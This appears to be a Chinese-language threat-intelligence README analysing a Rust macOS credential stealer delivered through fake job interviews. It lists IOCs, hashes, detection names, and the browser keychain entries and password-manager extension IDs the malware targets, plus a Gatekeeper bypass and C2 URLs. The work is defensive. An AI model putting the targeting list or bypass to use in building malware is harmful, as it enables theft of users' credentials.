nkbihfbeogaeaoehlefnkodbefgpgknn  nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad  nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd  nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd  ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb  ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl  oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo  ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch  oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm  olgpchjlegmakkhfbahgnjojlefnealp
olkbchllhcflpbjfgagahpkjnjioiedg  omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe  onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh  ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil  oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj  panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk  pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa  pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj  penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm  pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba  pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm  pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo  pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo  ppdadbejkmjnefldpcdjhnkpbjkikoip

范围与限制

  • 本仓库记录了针对单个恶意软件样本及其嵌入配置的静态分析与解密。
  • 活动归属是分析性的,基于恢复的基础设施和TTP重叠;它不是执法部门的归属声明。
  • 列出的Chrome扩展ID标识了被针对以窃取数据的合法扩展,而非恶意扩展。
  • 检测规则应在部署到生产环境之前,在目标环境中进行验证和调整。
  • STIX包遵循STIX 2.1,但为可读性使用了简化的ID;如果需要消除冲突,在导入生产CTI平台之前重新生成UUID。

发布历史

请参阅CHANGELOG.md获取版本更新。

贡献

请参阅CONTRIBUTING.md了解指南、问题模板和PR清单。

许可

分析文本和脚本以MIT许可证发布。IOC列表和威胁情报内容仅供防御目的;根据许可证条款允许在商业产品中重复使用。


在沙盒环境中进行独立逆向工程。加密配置通过静态分析和每个辅助CPU模拟恢复。请参阅scripts/decrypt_all.py和SECURITY.md。

下载工具
文件格式用途
iocs.txt纯文本哈希、域名、URL、IP、邮箱、Sentry ID — 粘贴到黑名单、MISP、OpenCTI
yara_rules.yarYARA 4.2+已知样本哈希匹配 + Mach-O 启发式字符串检测
sigma_rules.ymlSigma代理、DNS 和进程创建规则 — 调整 logsource 以适应你的 SIEM
stix/bundle.jsonSTIX 2.1机器可读的CTI包,包含指标、恶意软件SDO、基础设施、ATT&CK模式及关系
attack-navigator-layer.jsonATT&CK Navigator导入 ATT&CK Navigator 查看可视化技术覆盖率
元素详情
平台Wellfound (AngelList) — 正规求职网站
公司名称“HyperHive”(单数) / 域名 hyperhives.net
虚拟身份“Felix”
联系邮箱[email protected]
建立信任引用了目标真实的简历、LinkedIn 信息及具体技术技能
借口“面试前先体验产品”
触发载荷在 hyperhives.net 上操作“设置 → 诊断 → 日志”
时间安排虚假面试时间段(4月8日 15:00 UTC)以制造紧迫感
多步链条载荷投递前至少两封邮件,历时两天
属性值
文件installer_binary
大小8,504,768 字节
格式Mach-O 通用(x86_64 + arm64)
SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
SHA-12de897066c2fc7db91da78d7f9ded99237345077
MD50e95ab4038ec48657563c96bed840dd5
编译器rustc 1.87.0 (stable)
构建用户rootr(来自嵌入路径 /Users/rootr/.cargo/registry/...)
构建代号force
构建版本9.12.1
错误追踪Sentry Rust SDK v0.36.0
crate 数量97(参见 output/cargo_dependencies.txt)
引擎检测名称
KasperskyHEUR:Trojan-PSW.OSX.HashBreaker.e
DrWebMac.PWS.JobStealer.1
ESET-NOD32OSX/PSW.Agent.BX Trojan
MicrosoftTrojan:MacOS/Stealer!AMTB
Avast / AVGMacOS:Stealer-BU [Trj]
ElasticMalicious (high Confidence)
CynetMalicious (score: 99)
SentinelOneStatic AI - Suspicious Mach-O
浏览器数据路径钥匙串条目
ChromeGoogle/ChromeChrome Safe Storage
BraveBraveSoftware/Brave-BrowserBrave Safe Storage
Opera默认Opera Safe Storage
Opera GX默认Opera Safe Storage 2023
Vivaldi默认Vivaldi Safe Storage
Microsoft Edge默认Microsoft Edge Safe Storage
ArcArc/User Data—
CocCoc默认CocCoc Safe Storage
产品扩展ID(示例)
1Passwordaeblfdkhhhdcdjpifhhbdiojplfjncoa、khgocmkkpikpnmmkgmdnfckapcdkgfaf、gejiddohjgogedgjnonbofjigllpkmbf
ProtonPassghmbeldphafepmbegfdlkpapadhbakde
Dashlanefdjamakpfbbddfjaooikfcpapjohcfmg
Deloitte Credentials企业凭证存储
Gatekeeper 绕过对下载的二进制文件执行 xattr -c
VPN 感知“请使用 VPN 并重试”错误信息
https://cloudproxy.link/m/decode
指令 / 配置通道
https://cloudproxy.link/db/debug调试 / 诊断